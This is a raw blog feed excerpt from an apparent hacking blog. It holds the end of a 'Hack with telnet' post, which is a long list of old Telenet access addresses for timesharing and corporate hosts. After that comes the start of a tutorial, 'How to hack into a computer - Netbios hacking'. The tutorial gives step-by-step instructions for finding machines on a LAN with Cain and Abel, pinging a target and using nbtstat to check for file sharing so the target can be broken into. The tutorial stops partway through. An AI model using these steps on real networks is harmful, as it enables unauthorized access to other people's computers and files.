&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30320 - COMPUTER SHARING SERVICES&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30330 - COMPUTER SHARING SERVICES&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30335&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30337 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30339 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30340 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 303125&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30520&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30522&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30531&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30532 - C.S.I. TIMESHARING SERVICE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 30523 - C.S.I. TIMESHARING SERVICE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31231 - C.I.C. TIMESHARING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31232&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31235&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31236&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31240&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31247&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31248&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31249&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31250&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31254&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31279&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31289&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 312124&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 312127&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31325&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31327&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31340 - ADP NETWORK&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31341 - ADP NETWORK&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31345 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31359 - GENERAL MOTORS WARREN&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31360 - GENERAL MOTORS WARREN&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31361 - GM PARTS&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31363 - VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31370 - GM DECSYSTEM-20 TIMESHARING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31422&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31423&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31424 - MCAUTO VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31425 - MCAUTO VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31426&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31432&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31435 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31444&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 31726 - RSTS V06C-04&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 40420&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 40434&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 40822&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41520 - DIALOG&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41527 - STANFORD IBM-3033A&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41548 - DIALOG&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41556&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41560&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41561&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41562&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41567&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41580 - HARPER GROUP INFORMATION NETWORK&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 41587 - BUSSIPLEXER&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 51632&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 51633&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 51634&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 51638&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 51646&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 51647 - VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 51729&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60320 - DARTMOUTH COLLEGE COMPUTING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60322&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60324&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60328&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60331&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60720&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60942&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 60945&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61114&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61115&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61118&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61120&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61221&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61724&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61735 - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK CONTROL&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61748 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61750 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61760 - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK CONTROL&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61766 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61767 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61770 - NDC-SYSTEM#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61774&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61776 - NDC-SYSTEM#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61777 - NDC-SYSTEM#&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61778 - PRIMENET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617120&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617121&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617124&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617125&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617127&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617133&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617135 - VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61737 - VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617138 - MASSACHUSETTS INSTITUE OF&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617139 - MASSACHUSETTS INSTITUE OF&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617140 - VM/370 ONLINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617151&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617152&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617159&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61763&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61769 - (TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61770 - BPL-INFORONICS&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617171 - INTERACT LINE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617177 - ERT ENVIRONET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617178&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 617179 - ERT ENVIRONET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 61780 - (TYPE HELP)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 71424 - GLOBAL DATA TIMESHARING&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 71431 - (TYPE HELP)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 71620 - UNION CARBIDE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 80331&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 80423 - CONTROL DATA INTERCOM&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 80424 - CONTROL DATA INTERCOM&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 80426 - BABCOCK AND WILCOX&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 81623&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 81625 - UNINET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 81626 - UNINET&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 90995D - TELENET NEWS SERVICE&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 91930&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 91931&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;C 91933 C 91934&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/6616823361318179285/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hack-with-telnet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/6616823361318179285'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/6616823361318179285'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hack-with-telnet.html' title='Hack with telnet'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVGEKgXsrSkDuWsYGkbPX68oDi2cQGOR52O_6vmyd2AidGbSy5FpazIiRG4niHjdsC_MGxNWGsoccnYzA-Cz0hO_NX-4rKEPnGrO7mVBpMGFyLFW6I-isd8XDgrKm9pC2a9S-cyXojRZE/s72-c/startrun.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-7366468741442964363</id><published>2011-05-07T23:20:00.000-07:00</published><updated>2011-05-07T23:20:04.395-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Netbios hacking"/><title type='text'>How to hack into a computer - Netbios hacking</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b&gt;Netbios Hacking&lt;/b&gt; is the art of hacking into someone else’s &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;computer&lt;/span&gt; through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.&lt;br /&gt;
&lt;br /&gt;
In &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;this post&lt;/span&gt; i will tell you to &lt;b&gt;hack into a &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;computer with&lt;/span&gt; netbios &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD9&quot;&gt;hacking&lt;/span&gt;&lt;/b&gt; .Netbios hacking is the &lt;b&gt;easiest way to Hack into a remote computer&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://julianhakingarticles.blogspot.com/2011/04/how-to-hack-into-computer-netbios.html&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;Procedure for Netbios hacking&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
So first off we need to find a computer or the &lt;b&gt;computer to hack into&lt;/b&gt;. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the &lt;b&gt;sniffer tab&lt;/b&gt;, &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;click the&lt;/span&gt; &lt;b&gt;Start/Stop sniffe&lt;/b&gt;r, and then click the &lt;b&gt;blue cross&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Another window will pop up, make sure “&lt;b&gt;All host in my subnet&lt;/b&gt;” is &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;selected&lt;/span&gt;, and then click ok.&lt;br /&gt;
&lt;br /&gt;
&lt;img border=&quot;0&quot; class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios4copy.jpg&quot; style=&quot;border: 1px solid rgb(204, 204, 204); font-family: verdana; padding: 4px;&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
It should begin to scan.&lt;br /&gt;
&lt;br /&gt;
Then &lt;b&gt;IP’s&lt;/b&gt;, computer names, and &lt;b&gt;mac addresses&lt;/b&gt; will show up. Now remember the IP address of the computer you are going to be &lt;b&gt;breaking into&lt;/b&gt;. If you can’t tell whether the &lt;b&gt;IP address&lt;/b&gt; is a computer, router, modem, etc, that’s ok. During the next step we will begin our &lt;b&gt;trial and error&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;img border=&quot;0&quot; class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios1copy.jpg&quot; style=&quot;border: 1px solid rgb(204, 204, 204); font-family: verdana; padding: 4px;&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;command prompt&lt;/span&gt;. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to thehacking. Type in “ping (IP address of the target).” For example in this &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;tutorial&lt;/span&gt;, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD11&quot;&gt;information&lt;/span&gt;):&lt;br /&gt;
&lt;br /&gt;
&lt;img border=&quot;0&quot; class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios6.jpg&quot; style=&quot;border: 1px solid rgb(204, 204, 204); font-family: verdana; padding: 4px;&quot; /&gt;&lt;br /&gt;
IF it didn’t work, meaning that the target is not online, it will look something like this:&lt;br /&gt;
&lt;br /&gt;
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&amp;nbsp;STEP 2 - Hacking into a computer&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
--------------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, andcomputer name. &lt;br /&gt;
&lt;br /&gt;
&lt;img border=&quot;0&quot; class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios7.jpg&quot; style=&quot;border: 1px solid rgb(204, 204, 204); font-family: verdana; padding: 4px;&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line ofinformation, and then explain the paragraph that follows it. &lt;br /&gt;
&lt;br /&gt;
The information right below the original command says: “&lt;b&gt;Local Area Connection&lt;/b&gt;,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.&lt;br /&gt;
&lt;br /&gt;
The information right below the “&lt;b&gt;Local Area Connection&lt;/b&gt;,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of thecomputer you are going to break into. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a &amp;lt;20&amp;gt;. This means that file sharing is enabled on BATGIRL. If there was not a &amp;lt;20&amp;gt; to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and thecomputer , look under the Type category to the right of the &amp;lt; &amp;gt; for every Name. If it says UNIQUE, it is one system, such as a printer orcomputer. If it is GROUP, then it is the workgroup &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
